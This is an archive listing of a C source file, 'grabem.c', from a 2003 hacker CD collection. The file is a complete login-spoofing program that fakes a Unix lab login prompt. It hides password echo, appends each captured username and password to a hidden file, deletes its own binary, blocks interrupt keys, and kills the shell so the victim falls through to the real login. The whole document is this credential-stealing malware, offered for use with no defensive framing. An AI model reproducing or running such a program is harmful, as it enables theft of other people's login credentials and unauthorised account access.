home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Power Hacker 2003
/
Power_Hacker_2003.iso
/
Exploit and vulnerability
/
hoobie
/
grabem.c
< prev
next >
Wrap
C/C++ Source or Header
|
2001-11-06
|
5KB
|
107 lines
/*----------------------------------------------------------------------+
| GRABEM 1.0 by The K-Man |
| A Cute little program to collect passwords |
+----------------------------------------------------------------------*/
#define PASSWORD "Password:"
#define INCORRECT "\nLogin incorrect"
#define FILENAME ".exrc%"
#include
#include
/*-----------------------------------------------------------------------+
| ignoreSig |
| |
| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. |
+-----------------------------------------------------------------------*/
void ignoreSig ()
{
return;
}
/*-----------------------------------------------------------------------+
| Main |
+-----------------------------------------------------------------------*/
main()
{
char name[10], /* users name
*/
password[10]; /* users password
*/
int i, /* loop counter */
lab, /* lab # you're running on */
procid; /* pid of the shell we're under */
FILE *fp; /* output file
*/
/*-------------------------------------------------------------------------------+
| Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) |
| signals so the program doesn't stop and dump back to the shell. |
+-------------------------------------------------------------------------------*/
signal (SIGINT, ignoreSig);
signal (SIGTSTP, ignoreSig);
signal (SIGQUIT, ignoreSig);
/*---------------------------------------------------------------------------+
| Get the parent pid so that we can kill it quickly later. Remove |
| this program from the account. |
+---------------------------------------------------------------------------*/
procid = getppid();
system ("\\rm proj2");
/*-------------------------------------------------------------------+
| Ask for the lab # we're running on. Clear the screen. |
+-------------------------------------------------------------------*/
printf ("lab#: ");
scanf ("%d", &lab);
for (i=1; i<40; i++)
printf ("\n");
getchar();
/*-----------------------------------------------------------------------------+
| Outer for loop. If the name is <= 4 characters, it's probably not |
| a real id. They screwed up. Give 'em another chance. |
+-----------------------------------------------------------------------------*/
for(;;)
{
/*-----------------------------------------------------------------------+
| If they hit return, loop back and give 'em the login again. |
+-----------------------------------------------------------------------*/
for (;;)
{
printf("lab%1d login: ",lab);
gets (name);
if (strcmp (name, "") != 0)
break;
}
/*---------------------------------------------------------------------------+
| Turn off the screen echo, ask for their password, and turn the |
| echo back on. |
+---------------------------------------------------------------------------*/
system ("stty -echo > /dev/console");
printf(PASSWORD);
scanf("%s",password);
getchar();
system ("stty echo > /dev/console");
/*---------------------------------------------------------------+
| Write their userid and password to the file. |
+---------------------------------------------------------------*/
if ( ( fp = fopen(FILENAME,"a") ) != NULL )
{
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}
/*---------------------------------------------------------------+
| If the name is bogus, send 'em back through |
+---------------------------------------------------------------*/
if (strlen (name) >= 4)
break;
else
printf (INCORRECT);
}
/*--------------------------------------------------------------------------------+
| Everything went cool. Tell 'em they fucked up and mis-typed and |
| dump them out to the REAL login prompt. We do this by killing the |
| parent process (console). |
+--------------------------------------------------------------------------------*/
printf (INCORRECT);
kill (procid, 9);
}
